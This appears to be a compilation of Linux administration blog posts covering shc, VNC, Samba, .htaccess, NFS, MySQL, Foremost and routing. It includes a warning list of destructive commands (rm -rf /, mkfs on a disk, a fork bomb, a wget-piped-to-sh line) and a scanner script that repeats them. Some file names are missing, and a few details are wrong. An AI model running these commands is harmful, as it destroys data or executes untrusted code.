
Creating executable of Shell Script

Shell scripts often contain sensitive information such as passwords, keys, or paths to sensitive files, and anyone who can run such a script can just as easily look inside it and read that information from the code.
A program called "shc" offers developers some protection against this.

shc itself is not a compiler such as cc; rather, it encodes and encrypts a shell script and generates C source code with the added expiration capability. It then uses the system compiler to compile a stripped binary which behaves exactly like the original script. Upon execution, the compiled binary will decrypt and execute the code with the shell -c option. Unfortunately, it will not give you any speed improvement as a real C program would.

shc's main purpose is to protect your shell scripts from modification or inspection. You can use it if you wish to distribute your scripts but don't want them to be easily readable by other people. Keep in mind that the binary must decrypt the script itself each time it runs, so this is obfuscation that deters casual reading, not strong protection for the secrets inside.

Download shc and untar it:
tar -xzvf shc-X.X.tgz
cd shc-X.X/
make install
This will install the shc binary on your box.

Create a file called: and add the following contents for testing purpose

############################### ##############################
echo "This is a test shell script by Nikesh"
############################### ##############################

Now run the command:
shc -f

The switch "-f" specifies the source script to encrypt. The above command will create two files: and The encrypted shell script is: Run that binary and see the output:

This is a test shell script by Nikesh
Now you can distribute the without any fear

You can also specify a time limit on the shell script so that it will no longer execute after a certain date (expire) and you can specify a custom message to echo back to the user.

shc -e 09/12/2008 -m "Licence expire, please contact author - Nikesh" -f
./ has expired!
Licence expire, please contact author - Nikesh

Check out the man pages for more info on "shc".

Quick and Easy VNC Server setup

VNC, or Virtual Networked Computing, is a way of controlling a remote computer just as though you are sitting in front of it. In the Windows world it is also known as remote desktop but it's normally referred to as VNC in the Linux world. All that happens is that you connect using a VNC client to a remote computer running the VNC server, then an image of the remote desktop is transmitted to your local computer and you can see and control the desktop just as though you are there since all keyboard and mouse commands are sent from your client machine to the server.

Step 1 : Installation
First check whether the packages are already installed on your system. Open a terminal and type:
$ rpm -qa | grep vnc
If the command lists the VNC packages, you're all set; if not, you need to install them via yum.

Step 2 : Start the VNC server.
$ vncserver

New 'server:1 (user)' desktop is server:1

This will ask for a password. Remember it, because you need to provide it when connecting to the server through a VNC client.

Step 3 : Connecting from VNC client
From the client, run vncviewer (don't run Remote Desktop Connection from Windows XP or Windows 2003; they use a different protocol).
In server enter : server:1
enter password: **********
You will see a screen with one terminal open, because by default VNC starts the twm desktop.
To get your GNOME desktop, go to the folder /user/.vnc/ (user home directory), open the file xstartup with the vi editor, and uncomment or add the following line:
exec /etc/X11/xinit/xinitrc
Restart the vncserver and connect to it using vncviewer; you should now see your default desktop.

A script for managing file archives of various types

atool is a script for managing file archives of various types (tar, tar+gzip, zip etc).

The main command is aunpack which extracts files from an archive. Did you ever extract files from an archive, not checking whether the files were located in a subdirectory or in the top directory of the archive, resulting in files scattered all over the place? aunpack overcomes this problem by first extracting to a new directory. If there was only a single file in the archive, that file is moved to the original directory. aunpack also prevents local files from being overwritten by mistake.

The other commands provided are apack (to create archives), als (to list files in archives), and acat (to extract files to standard out). As atool invokes external programs to handle the archives, not all commands may be supported for a certain type of archives.

atool identifies archives by their file extension. Sometimes this is not possible - for instance rar archives usually have varying numeric file extensions. In those cases when atool can't identify the format, file is used instead. (atool can be configured not to use file.)

atool is written in Perl by Oskar Liljeblad and is free software (GNU General Public License).

The latest version of atool is 0.35.0, which was released on 2008-06-08:
Source code tarball
Debian package (all architectures)
RPM package (all architectures)

Building from source
To build all files, simply run: ./configure
The configure script accepts a few options - use the following command to show them: ./configure --help

Installing atool is a matter of copying the atool file to some appropriate directory for executable files, usually /usr/local/bin. After that, symbolic links for apack, aunpack, als and acat to atool should be created in the same directory. All this can be done automatically by running: make install

Usage and Configuration
A list of options that atool accepts can be displayed by running atool with the --help option:  atool --help
Please see the manual page for atool for full use and configuration information. This document can usually be viewed this way:  man ./atool.1

Firewall for Ubuntu - Gufw

iptables is already a very powerful tool by itself, but its syntax can get awkward at times and hard to figure out, so Ubuntu developers decided to make ufw ("The reason ufw was developed is that we wanted to create a server-level firewalling utility that was a little bit more for `human beings`."), which was to be simpler. Now, on the graphical side of things, Firestarter already existed. But why not make an even easier to use GUI for desktop `human beings`, powered by ufw? This is where Gufw comes in.

Gufw is an easy to use Ubuntu / Linux firewall, powered by ufw.

Gufw is an easy, intuitive way to manage your Linux firewall. It supports common tasks such as allowing or blocking pre-configured, common p2p, or individual port(s), and many others! Gufw is powered by ufw, runs on Ubuntu, and anywhere else Python, GTK, and ufw are available.

You can install it on ubuntu with this deb package: here

Creating Recycle Bin for Samba storage

I assume that you have successfully configured the Samba server; if not, here is a quick and dirty Samba configuration guide - here

Samba is mainly used to share files between Linux and Windows, and it often happens that a user deletes a file from the Samba server and later wants to get it back, which is not possible with the default configuration of the Samba server.

The best option is to have a "Recycle bin" for every user on the Samba server.
Here is an example of modifying the home directories of your users in the Samba configuration file:
[homes]
comment = Home Directory
valid users = %S
browsable = no
guest ok = no
read only = no
vfs object = recycle
recycle:repository = RecycleBin
recycle:keeptree = yes
recycle:exclude = *.tmp, *.bak
The “vfs object” line calls in the plug-in that enables recycle bin capability.  On the other lines, you’re setting the name of the recycle bin directory, telling Samba to preserve the whole structure of any directories that a user may delete, and finally, telling it to not keep certain types of files.

Using .htaccess for password protecting web directory

Htaccess can be used to password-protect directories on your web site. All files and any subdirectories within a directory protected by htaccess will also be protected.

1) Create a file named .htaccess under the directory which you want to protect

# cd /srv/www/htdocs/protect/
# pwd

Use your favourite editor to create a file called .htaccess

# touch .htaccess

2) Add the required lines to this .htaccess file
AuthUserFile /etc/apache/.htpasswd
AuthName "Auth required"
AuthType Basic
Require valid-user
It's a good idea to place the password file in a secure location (the /etc/apache folder).

3) Create the .htpasswd file and add the users/passwd
# cd /etc/apache
# htpasswd2 -c .htpasswd nikesh
New password:
Re-type new password:
Adding password for user nikesh
This will add the user "nikesh" and password into the .htpasswd file, you can open and check the entry (you won't be able to read the password)

To delete the user entry:  # htpasswd2 -D .htpasswd nikesh
To add new user:  # htpasswd2 .htpasswd user

4) Configure the apache configuration file (httpd.conf)
Alias /protect "/srv/www/htdocs/protect/"
<Directory "/srv/www/htdocs/protect/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride AuthConfig
        Order allow,deny
        Allow from all
</Directory>

When you set up a .htaccess file, it is effective for the directory it is placed in as well as any subdirectories. If you wanted to set up a directory so that it could execute CGI scripts, you could use a .htaccess file to do that.

Here the most important part is the option "AuthConfig" for "AllowOverride", if for some reason you don't want to use the .htaccess file, just place the option "None" for "AllowOverride".

5) After doing all the required changes, restart the apache server.

Now, just browse to the directory path that you have protected and see if you get the username/password dialog. Provide the correct values and see if you are allowed to enter.

Below are the most common problems experienced by users attempting to setup htaccess.

   1. Permissions on both .htaccess and .htpasswd - Both the .htaccess and .htpasswd files need to be world readable.
   2. Fully qualified path to .htpasswd incorrect - The correct fully qualified path to a valid .htpasswd file must appear beside AuthUserFile in the .htaccess file.
   3. The username doesn’t exist in .htpasswd
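
The three problems above can be checked mechanically before restarting Apache. The following is an added example, not part of the original post: `check_htaccess` and `htaccess_demo` are hypothetical names, and the demo files are constructed in a temporary directory. It also flags a password file stored inside the protected directory, following the advice in step 2.

```shell
#!/bin/sh
# Added example, not part of the original post. check_htaccess is a
# hypothetical helper; it prints one status word and returns non-zero on
# any problem. "-r" tests the invoking user, so run it as the account the
# web server runs under. Paths containing spaces are not handled.
check_htaccess() {
    htaccess=$1
    user=$2

    # Problem 1: .htaccess itself must be readable.
    [ -r "$htaccess" ] || { echo "unreadable-htaccess"; return 1; }

    # Take the path that follows AuthUserFile, dropping optional quotes.
    pwfile=$(awk 'tolower($1) == "authuserfile" {
                      gsub(/"/, "", $2); print $2; exit }' "$htaccess")
    [ -n "$pwfile" ] || { echo "no-authuserfile"; return 1; }

    # Problem 2: the path must be fully qualified and must exist.
    case $pwfile in
        /*) ;;
        *)  echo "relative-path"; return 1 ;;
    esac
    [ -f "$pwfile" ] || { echo "missing-htpasswd"; return 1; }
    [ -r "$pwfile" ] || { echo "unreadable-htpasswd"; return 1; }

    # The post advises keeping the password file out of the web tree.
    webdir=$(cd "$(dirname "$htaccess")" && pwd)
    case $pwfile in
        "$webdir"/*) echo "htpasswd-in-web-dir"; return 1 ;;
    esac

    # Problem 3: the user needs a "user:hash" line in the password file.
    awk -F: -v u="$user" '$1 == u { found = 1 } END { exit !found }' "$pwfile" \
        || { echo "unknown-user"; return 1; }
    echo "ok"
}

# Constructed demo: a web directory and a password file outside it.
htaccess_demo() {
    d=$(mktemp -d) || return 1
    mkdir "$d/web" "$d/secure"
    printf 'nikesh:{SHA}constructed-hash\n' > "$d/secure/.htpasswd"
    printf 'AuthUserFile %s\nAuthName "Auth required"\nAuthType Basic\nRequire valid-user\n' \
        "$d/secure/.htpasswd" > "$d/web/.htaccess"
    for u in nikesh guest; do
        echo "$u: $(check_htaccess "$d/web/.htaccess" "$u" || true)"
    done
    rm -rf "$d"
}
htaccess_demo
```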

System Information

This displays processor information, including its type, make, model, and performance.
This shows which DMA channels are currently being used.
This shows which interrupts are in use and how many of each have been in use.
This displays the status of I/O (input/output) memory.
This shows which I/O ports are in use at the moment.
This displays memory status.
This displays the individual modules.
This displays devices currently mounted.
This shows the partitioning of all hard disks.
This displays the current version of Linux.

OpenSuse Log files

Log File
Messages from the desktop applications currently running. The ~ is the home directory of the current user.
Log files from AppArmor, see Novell AppArmor Administration Guide (↑Novell AppArmor Administration Guide) for detailed information.
Log file from Audit to track any access to files, directories, or resources of your system and trace system calls.
Messages from the kernel during the boot process.
Messages from the mail system.
Ongoing messages from the kernel and system log daemon when running.
Log file from NetworkManager to collect problems with network connectivity
Directory containing Samba server and client log messages.
Hardware messages from the SaX display and KVM system.
All messages from the kernel and system log daemon assigned WARNING level or higher.
Binary file containing user login records for the current machine session. View it with last.
Various start-up and runtime logs from the X Window system. It is useful for debugging failed X start-ups.
Directory containing YaST's actions and their results.
Log file of zypper.

Linux Directory Structure

Root directory—the starting point of the directory tree.
Essential binary files, such as commands that are needed by both the system administrator and normal users. Usually also contains the shells, such as Bash.
Static files of the boot loader.
Files needed to access host-specific devices.
Host-specific system configuration files.
Holds the home directories of all users who have an account on the system. Only root's home directory is not located in /home but in /root.
Essential shared libraries and kernel modules.
Mount points for removable media.
Mount point for temporarily mounting a file system.
Add-on application software packages.
Home directory for the superuser root.
Essential system binaries.
Data for services provided by the system.
Temporary files.
Secondary hierarchy with read-only data.
Variable data such as log files.
Only available if you have both Microsoft Windows* and Linux installed on your system. Contains the Windows data.

NFS configuration for central storage

Configuring The NFS Server
1. Edit the /etc/exports file to allow NFS mounts of the /home directory with read/write access.

/home                   *(rw,sync,no_subtree_check)

The option listing for each machine will describe what kind of access that machine will have. Important options are:

ro: The directory is shared read only; the client machine will not be able to write to it. This is the default.

rw: The client machine will have read and write access to the directory.

no_root_squash: By default, any file request made by user root on the client machine is treated as if it is made by user nobody on the server. (Exactly which UID the request is mapped to depends on the UID of user "nobody" on the server, not the client.) If no_root_squash is selected, then root on the client machine will have the same level of access to the files on the system as root on the server. This can have serious security implications, although it may be necessary if you want to perform any administrative work on the client machine that involves the exported directories. You should not specify this option without a good reason.

no_subtree_check: If only part of a volume is exported, a routine called subtree checking verifies that a file that is requested from the client is in the appropriate part of the volume. If the entire volume is exported, disabling this check will speed up transfers.

sync: By default the exportfs command will use async behavior, telling a client machine that a file write is complete - that is, has been written to stable storage - when NFS has finished handing the write over to the filesystem. This behavior may cause data corruption if the server reboots, and the sync option prevents this.

2. Let NFS read and make /home available to the network with the exportfs command.

# exportfs -a

3. Make sure the required nfs, nfslock, and portmap daemons are running and configured to start after the next reboot.

# chkconfig nfslock on
# chkconfig nfs on
# chkconfig portmap on

# service portmap start
# service nfslock start
# service nfs start
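
The export in step 1 uses `*` as the client, so any host that can reach the server may mount /home read-write. The following added example (not from the original post) audits a file in /etc/exports syntax for that case and for the no_root_squash and async options described above; `audit_exports` and `sample_exports` are hypothetical names and the sample entries are constructed.

```shell
#!/bin/sh
# Added example, not from the original post. audit_exports and
# sample_exports are hypothetical names; the sample entries are constructed.

# Print "<path> <client> <finding>" for every risky client entry.
# Reads the files given as arguments, or stdin when there are none.
audit_exports() {
    awk '
    NF == 0 || $1 ~ /^#/ { next }          # skip blank lines and comments
    {
        path = $1
        for (i = 2; i <= NF; i++) {
            # Split "client(opt,opt,...)" into its two halves.
            client = $i; opts = ""
            p = index($i, "(")
            if (p > 0) {
                client = substr($i, 1, p - 1)
                opts = substr($i, p + 1)
                sub(/\)$/, "", opts)
            }
            # "(rw)" with no host in front of it applies to every host.
            if (client == "") client = "*"

            rw = 0; squash_off = 0; async = 0
            n = split(opts, o, ",")
            for (j = 1; j <= n; j++) {
                if (o[j] == "rw") rw = 1
                if (o[j] == "no_root_squash") squash_off = 1
                if (o[j] == "async") async = 1
            }
            if (client == "*") print path, client, (rw ? "any-host-rw" : "any-host-ro")
            if (squash_off) print path, client, "no_root_squash"
            if (async) print path, client, "async"
        }
    }' "$@"
}

# Constructed sample; the first entry is the export line from step 1.
sample_exports() {
    cat <<'EOF'
# constructed sample in /etc/exports syntax
/home        *(rw,sync,no_subtree_check)
/srv/backup  192.168.1.10(rw,sync,no_root_squash)
/srv/pub     *(ro,sync)
/srv/scratch client1.example.com(rw,async)
/srv/docs    192.168.1.0/24(ro,sync)
EOF
}

sample_exports | audit_exports
```

Replacing `*` with the client subnet, as in the constructed /srv/docs entry, clears the any-host finding for /home.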

Configuring The NFS Client
1. Make sure the required netfs, nfslock, and portmap daemons are running and configured to start after the next reboot.

# chkconfig nfslock on
# chkconfig netfs on
# chkconfig portmap on

# service portmap start
# service netfs start
# service nfslock start

2) Now mount the NFS (server) /home to this client

# mount server:/home /home/

3) Configure autofs: edit your /etc/auto.master file to refer to file /etc/auto.home for mounting information whenever the /home directory is accessed. After five minutes, autofs unmounts the directory.

# vi /etc/auto.master
/home      /etc/auto.home --timeout 600

4) Edit file /etc/auto.home to do the NFS mount whenever the /home directory is accessed.

# vi /etc/auto.home
*   -fstype=nfs,soft,intr,rsize=8192,wsize=8192,nosuid,tcp server:/home/&

Multimedia support in OpenSuse 11.1 (MP3, MPEG-4, DiVX, etc.)

Why doesn’t OpenSuSe support MP3 ‘out of the box’?
OpenSuSe cannot include support for MP3 or DVD video playback or recording. MP3 formats are patented, and the patent holders have not provided the necessary licenses. OpenSuSe also excludes other multimedia software due to patent, copyright, or license restrictions, such as Adobe Flash Player and RealNetworks RealPlayer.
That doesn’t mean you can’t play .mp3 files in OpenSuSe , it just takes a bit of work (not much).

Follow these instructions to get mp3 and other multimedia support on your OpenSuSe 11.1.

If you are using KDE - Download and run (execute) this
If you are using Gnome - Download and execute this

Want VLC player - Download and run this

This will enable you to have:
Latest Amarok (with MP3 Support) for KDE, or Helix-Banshee for GNOME users
Encrypted DVD (libdvdcss)
Extra XINE Codecs, for DivX/Xvid etc. (libxine1)
K3b with MP3 Support (k3b-codecs)
Win 32 Codecs (w32codec-all)

After successful installation you should be able to play any media files.


How to change the Mysql users and root password

There are two ways to change the MySQL user and root passwords.

If you have never set a root password for MySQL, the server does not require a password at all for connecting as root. To setup root password for first time, use mysqladmin command at shell prompt as follows:

$ mysqladmin -u root password NEWPASSWORD

However, if you want to change (or update) a root password, then you need to use the following command, which prompts for the old password:

$ mysqladmin -u root -p password newpass

Enter password:

Change MySQL password for other user

To change a normal user password you need to type (let us assume you would like to change password for nikesh):

$ mysqladmin -u nikesh -p password newpass

Changing MySQL root user password using mysql sql command
This is another method. MySQL stores usernames and passwords in the user table inside the mysql database. You can directly update the password using the following method to update or change the password for user nikesh:

1) Login to mysql server, type following command at shell prompt:

$ mysql -u root -p

2) Use mysql database (type command at mysql prompt):

mysql> use mysql;

3) Change password for user nikesh:

mysql> update user set password=PASSWORD("NEWPASSWORD") where User='nikesh';

4) Reload privileges:

mysql>  flush privileges;
mysql> quit

Recovering deleted file using Foremost

Ever deleted an important file? I haven’t recently done this on Linux, but when I used Windows I had a utility for recovering deleted files.

Foremost is a command line utility for finding and recovering deleted files based on their type. It was originally developed for the US Air Force Office of Special Investigations.

How is this type of data recovery possible? When you delete a file, the data is not really overwritten. The pointer in the filesystem to the file is simply removed so the disk area can be overwritten when necessary. The more the disk is written to after the file is deleted, the larger the chance it will be overwritten and become unrecoverable.

I decided to test out Foremost in a virtual machine. First, I created some JPEG images, deleted them, and emptied the trash. Next, I shutdown the system and booted up the Ubuntu 8.04 Beta live-CD. Live-CDs don’t write to the hard disk, so they work well for data recovery.

Installing it in Ubuntu is rather simple: just issue the standard “sudo apt-get install foremost” command. If you use another distro, you will have to check whether it’s in your repositories; if not, the source can be grabbed at the link at the top of the screen and can be compiled - check this.

You need to know your target partition’s path to recover from it. You can simply start System-Administration->Partition Editor in Ubuntu, or use fdisk, Qtparted or any partition editor to see what discs are for what purpose. I saw that the home partition is /dev/sda1 on my machine.

Let’s recover some JPEG images:

sudo foremost -t jpeg -i /dev/sda1

Now the -t switch denotes that you’re looking for a file type. The -i switch denotes you’re looking on a particular device. This command causes Foremost to create a directory called output and put every file it can recover in. This could take a while.

Foremost isn’t the greatest solution; it recovers every file it sees and doesn’t support very many file types. It is possible to add types to the /etc/foremost.conf file, but it doesn’t look like an easy task. However, if you’ve lost a bunch of photos or documents, Foremost could be just what you need.

Check out the man pages for more.

Installation and Configuration of VMWare on Ubuntu Intrepid (8.10)

1 - First, obtain a license from VMware here

2 - Install the following packages
apt-get install linux-source-2.6.27 linux-libc-dev xinetd

3 - Then, download VMware
Untar: tar -xvzf VMware-server-1.0.8-126538.tar.gz
cd vmware-server-distrib/

4 - Run the installer
-> Answer yes to each question until it asks whether to run the configure script, to which reply "No"

5 - Now, it is necessary to download the patch in order to build the kernel module (Tested with 2.6.27-7-generic)
tar -xvzf vmware-update-2.6.27-5.5.7-2.tar.gz
cd vmware-update-2.6.27-5.5.7-2

-> Answer yes to all questions and press ENTER to use the default settings.

6 - Check whether the service is running

/etc/init.d/vmware status
Bridged networking on /dev/vmnet0 is running
Host-only networking on /dev/vmnet1 is running
Host-only networking on /dev/vmnet8 is running
NAT networking on /dev/vmnet8 is running
Module vmmon loaded
Module vmnet loaded

Gnome 3 mockup screenshots


Configure Amarok to use MySQL DB

Amarok 1.2 and above support a MySQL database backend in addition to the built-in SQLite database engine.

Amarok 1.4 requires MySQL 4.0 or better, and is known to work with MySQL versions up to 5.0.22 (but, at the time of writing, not 5.0.24). Since Amarok-1.4.2 MySQL-5.0.24 also works. Amarok 1.4.5 works with MySQL 5.0.27.

Older versions of Amarok may work best with MySQL versions < 5.0. One known problem as a result of this is Amarok's DB continually growing and adding multiple entries for every track on each rescan.

If your locale is UTF-8, make sure the default character set for your MySQL daemon is set to utf8, so that all databases and tables are created with character set utf8. In Debian:

1) Edit /etc/mysql/my.cnf, adding this line to stanzas [client] and [mysqld]:

default-character-set = utf8

2) Restart the MySQL daemon to pick up the new default charset

Do this before you create the database for amarok.

Make sure the MySQL daemon is running. If necessary, add it to your linux startup scripts, via whatever method your distro uses.

Create a root password for MySQL, if you have not already done so.
$ mysql -u root
set password for root@localhost = password('xxxxxxx');
flush privileges;
Of course change xxxxxx to the password you want.

Once you have done that, you must create a MySQL database and a user for Amarok through any usual method. You can just use the "mysql" command (it will ask for your MySQL root password):
$ mysql -p -u root
CREATE DATABASE amarok;
USE amarok;
GRANT ALL ON amarok.* TO amarok@localhost IDENTIFIED BY 'PASSWORD_CHANGE_ME';
In the above example, a database called "amarok" and a user called "amarok" were created. This user can access the database from localhost using the password "PASSWORD_CHANGE_ME". To allow access from remote hosts, use amarokuser@'%'.

It is very important that you 'GRANT ALL' privileges to user "amarok". In particular, "amarok" needs ALTER privileges on its database.

Once a database exists, open the Configure Amarok screen (found in the Settings menu), and go to the Collection tab. Change the drop-down menu from SQLite to MySQL. You will have to specify the host ("localhost" if the database is in your local box), port (3306 is the common value), and the name of the database that you have created for it ("amarok" in our example). Additionally, the username and password of a user who has write access to the given database needs to be specified (in our example, the user is "amarok", and the password is "PASSWORD_CHANGE_ME").

So if you get errors about not being able to connect to the server or database, (_not_ password related errors) then you will have to edit my.cnf on the host machine (/etc/mysql/my.cnf, most likely), comment out the "bind_address" variable and restart MySQL. You may have to comment out "skip_networking", so that MySQL will listen on a tcp socket.

The 7 most dangerous commands of GNU/Linux

1. rm -rf /
This powerful command deletes all files under the root directory "/".

2. Code:

The code for this item is a C character array of hex-escaped bytes: the hex version of [rm -rf /], which can deceive even users of GNU/Linux who are not experienced.

3. mkfs.ext3 /dev/sda

This reformats the device named after the mkfs command, destroying all the files on it.

4. :(){:|:&};:

Known as a fork bomb, this command runs a large number of processes until the system freezes. This can lead to data corruption.

5. any_command > /dev/sda

This command causes total loss of data on the partition named in the command.

6. wget http://some_untrusted_source -O- | sh

Never download from untrusted sources and execute the result directly; it may contain malicious code.

7. mv /home/yourhomedirectory/* /dev/null

This command moves all the files in your home directory to a place that does not exist; you will never see your files again.

If you know of any other dangerous command, please let me know and I will include it here.
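
A pre-flight check for scripts or snippets copied from the web, flagging the literal forms listed in this post before anything is run. This is an added example, not part of the original post: `scan_script` and `sample_script` are hypothetical names, the sample input is constructed and only ever treated as text, and a line-based pattern match like this catches the plain forms only.

```shell
#!/bin/sh
# Added example, not from the original post. scan_script and sample_script
# are hypothetical names. Prints "<line number>:<rule>" for each finding.
# Reads the files given as arguments, or stdin when there are none.
scan_script() {
    awk '
    function report(rule) { print NR ":" rule }
    {
        line = $0

        # Item 4: fork bomb, compared with all whitespace removed.
        compact = line; gsub(/[ \t]/, "", compact)
        if (index(compact, ":(){:|:&};:")) report("fork-bomb")

        # Item 2: a long run of hex-escaped bytes inside source code.
        tmp = line
        if (gsub(/\\x[0-9a-fA-F][0-9a-fA-F]/, "", tmp) >= 8) report("hex-escaped-bytes")

        # Item 5: output redirected onto a raw disk device.
        if (line ~ />[ \t]*\/dev\/(sd|hd|vd|nvme)/) report("write-to-disk")

        # Item 6: a download piped straight into a shell.
        if ((line " ") ~ /(wget|curl)[^|]*\|[ \t]*(sudo[ \t]+)?(ba)?sh[ \t]/)
            report("pipe-to-shell")

        # Items 1, 3 and 7: look at the arguments of rm, mkfs.* and mv.
        cmd = ""; flags = ""; last = ""; root = 0; dev = 0
        for (i = 1; i <= NF; i++) {
            if (cmd == "") {
                if ($i == "rm" || $i == "mv" || $i == "mkfs" || $i ~ /^mkfs\./) cmd = $i
                continue
            }
            if ($i ~ /^-/) { flags = flags $i; continue }
            if ($i == "/" || $i == "/*") root = 1
            if ($i ~ /^\/dev\/./) dev = 1
            last = $i
        }
        if (cmd == "rm" && root && flags ~ /[rR]/) report("rm-root")
        if (cmd ~ /^mkfs/ && dev) report("mkfs-device")
        if (cmd == "mv" && last == "/dev/null") report("mv-to-devnull")
    }' "$@"
}

# Constructed sample. The quoted heredoc keeps every line as inert text;
# the hex bytes are a harmless constructed run of the letter "A".
sample_script() {
    cat <<'EOF'
#!/bin/sh
echo "cleaning up old builds"
rm -rf /
rm -rf ./build
char buf[] = "\x41\x41\x41\x41\x41\x41\x41\x41";
mkfs.ext3 /dev/sda
:(){:|:&};:
any_command > /dev/sda
wget http://some_untrusted_source -O- | sh
mv /home/yourhomedirectory/* /dev/null
ls > /dev/null
EOF
}

sample_script | scan_script
```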


Running Linux on Windows XP

"If Linux runs on every architecture, why should another operating system be in its way? "

Cooperative Linux is the first working free and open source method for optimally running Linux on Microsoft Windows natively. More generally, Cooperative Linux (short-named coLinux) is a port of the Linux kernel that allows it to run cooperatively alongside another operating system on a single machine.

For instance, it allows one to freely run Linux on Windows 2000/XP, without using a commercial PC virtualization software such as VMware, in a way which is much more optimal than using any general purpose PC virtualization software.

Unlike in other Linux virtualization solutions such as User Mode Linux (or the aforementioned VMware), special driver software on the host operating system is used to execute the coLinux kernel in a privileged mode (known as ring 0 or supervisor mode).

coLinux is a port of the standard Linux kernel. In other words, coLinux is the Linux kernel that's modified to run cooperatively with another operating system. The host operating system (Windows or Linux) maintains control of the physical resources of the operating system, while the guest operating system (coLinux) is provided with a virtual abstraction of the hardware. The host operating system must provide the means to execute a driver in the privileged ring (ring 0) and export the means to allocate memory.

The root file system for coLinux is a regular file within the host operating system. To Windows it's just a regular file, but to coLinux it's an ext3 file system that can be read and written to.

To cooperatively share hardware with the host operating system, coLinux does not access I/O devices directly. Instead, it interfaces with emulated devices provided by the coLinux drivers in the host OS. For example, a regular file in Windows can be used as a block device in coLinux. All real hardware interrupts are transparently forwarded to the host OS, so this way the host OS's control of the real hardware is not being disturbed and thus it continues to run smoothly.

Unlike User Mode Linux, coLinux always utilizes only one process of the host OS for all its Linux processes, privately managing their scheduling, resources, and faults in a manner which is contained and entirely independent of the way the host OS is implemented. In fact, coLinux only requires a very small set of commonly exported primitives from the host OS kernel in order to work, thus, it can be rather easily ported to run under any operating system, such as Solaris, or even Linux itself.

Download: here

Configure Routing , NAT and Gateway in Linux

A router is a device that directs network traffic destined for an entirely different network in the right direction. For example, suppose your network has the IP address range of and you also have a different network which has network addresses in range . Note that these are ‘Class C’ network addresses which are subnetted. So for your computer ( on the network ) to directly communicate with a computer in the network, you need an intermediary to direct the traffic to the destination network. This is achieved by a router.

Configuring Linux as a router
Linux can be effectively configured to act as a router between two networks. To activate routing functionality , you enable IP forwarding in Linux. This is how you do this:

# echo "1" > /proc/sys/net/ipv4/ip_forward

Now you have enabled IP forwarding in Linux. Now make this change persistent across reboots by editing the file /etc/sysctl.conf and entering the following line:

# vi /etc/sysctl.conf

net.ipv4.ip_forward = 1

Optionally, after editing the above file, you may execute the command :
# sysctl -p

Note: For your linux machine to act as a router, you need two Ethernet cards in your machine or you can also configure a single ethernet card to have multiple IP addresses.

What is a gateway?
Any device which acts as the path to or from your network to another network or the internet is considered to be a gateway. Let me explain this with an example: Suppose your computer, machine_B has an address with default netmask. And another computer (machine_A) with an IP address in your network is connected to the internet using a USB cable modem. Now if you want machine_B to send or receive data destined for an outside network, a.k.a. the internet, it has to direct it to machine_A first, which forwards it to the internet. So machine_A acts as the gateway to the internet. Each machine needs a default gateway to reach machines outside the local network. You can set the gateway in machine_B to point to machine_A as follows:
# route add default gw machine_A

Or if DNS is not configured…

# route add default gw

Now you can check if the default gateway is set on machine_B as follows:

# route -n

Note: Additional routes can be set using route command. To make the changes persistent across reboots, you may edit the /etc/sysconfig/static-routes file to show the configured route.

What is NAT ?
Network Address Translation (NAT) is a capability of linux kernel where the source or destination address / port of the packet is altered while in transit.

This is used in situations where multiple machines need to access the internet with only one official IP address available. A common name for this is IP masquerading. With masquerading, your router acts as a OSI layer 3 or layer 4 proxy. In this case, Linux keeps track of the packet(s) journey so that during transmission and recipt of data, the content of the session remains intact. You can easily implement NAT on your gateway machine or router by using Iptables, which I will explain in another post.

Alternate Linux desktops (Window Manager)

Most Linux users are familiar with KDE and GNOME, as both are desktop environments used by most major Linux distributions, but there are some really good alternative window managers out there. If you have an old PC with minimal hardware and want to run a GUI on it, the list of window managers below will help you choose one.

XFCE is a lightweight desktop environment for Unix operating systems. Its main goal is to be fast and light, while being visually attractive and easy to use. It is based on the GTK+ toolkit, the same as GNOME, so if you are a GNOME fan, you'll find XFCE very useful.

Enlightenment is a themeable, fast, flexible, and powerful window manager that is designed to be as configurable as possible in both look and feel. In addition, Enlightenment provides an applet API that provides functionality somewhere between the GNOME applet system and Dock Apps from Afterstep/WindowMaker. The current design aim is for Enlightenment to become a desktop shell.

FVWM-Crystal aims to create an easy to use, eye-candy but also powerful desktop environment for Linux or other Unix-like operating systems. It uses the following programs: FVWM as a window manager and "main core", ROX-Filer as file manager (manages icons on the desktop), xterm, aterm, mrxvt or urxvt as terminal emulators, MPD or XMMS as music players (there's built-in support for controlling these programs), and several other tools for different functions, like setting a wallpaper or making screen shots.

LXDE, the "Lightweight X11 Desktop Environment", is an extremely fast-performing and energy-saving Linux desktop environment maintained by an international community of developers. It comes with a beautiful interface, multi-language support, standard keyboard shortcuts and additional features like tabbed file browsing. LXDE uses less CPU and less RAM. It is especially designed for computers with low hardware specifications like netbooks, mobile internet devices (MIDs) or older computers. LXDE can be installed with distributions like Ubuntu or Debian. Applications running on these systems will run with LXDE. The source code of LXDE is licensed partly under the terms of the General Public License and partly under the LGPL.

IceWM is simple and highly configurable. All settings are stored as plain text files on the user's home directory, so it is easy to customize and configure it. You can apply your favorite theme and make it appear Windows Vista, Mac OS X or whatever you want.

Fluxbox is a windowmanager for X that was based on the Blackbox 0.61.1 code. It is very light on resources and easy to handle but yet full of features to make an easy, and extremely fast, desktop experience. It is built using C++ and licensed under the MIT-License.

Window Maker
Window Maker is an X11 window manager originally designed to provide integration support for the GNUstep  Desktop Environment. In every way possible, it reproduces the elegant look and feel of the NEXTSTEP[tm] user interface. It is fast, feature rich, easy to configure, and easy to use.

Window Maker includes compatibility options which allow it to work with other popular desktop environments, namely GNOME and KDE, and comes with a powerful GUI configuration editor, called WPrefs, which removes the need to edit text-based config files by hand.

AfterStep is a window manager for the Unix X Window System. Originally based on the look and feel of the NeXTStep interface, it provides end users with a consistent, clean, and elegant desktop. The goal of AfterStep development is to provide for flexibility of desktop configuration, improving aesthetics, and efficient use of system resources.

Some of the distinguishing features of AfterStep compared to other window managers are its low usage of resources, stability and configurability.


Songbird 1 (Final) Linux Installation on Fedora, Ubuntu and Others

Songbird project is a desktop Web player, a digital jukebox and Web browser mash-up. Like Winamp, it supports extensions and skins feathers.

Like Firefox, it is built from Mozilla, cross-platform and open source.

Fedora Linux:
Provided by Auralvance (Rutgers University)
Updated: 12/6/08 1.0.0 Rev 1
NOTES: For MP3 and other audio licensed playback you must have the full complement of gstreamer plugins installed (good, bad, ugly, etc) - Check here

Songbird 1.0.0 - Fedora 9 - i386
Songbird 1.0.0 - Fedora 9 - x86_64

Songbird 1.0.0 - Fedora 10 - i386
Songbird 1.0.0 - Fedora 10 - x86_64

After downloading the rpm file, you just need to install the package using the command:
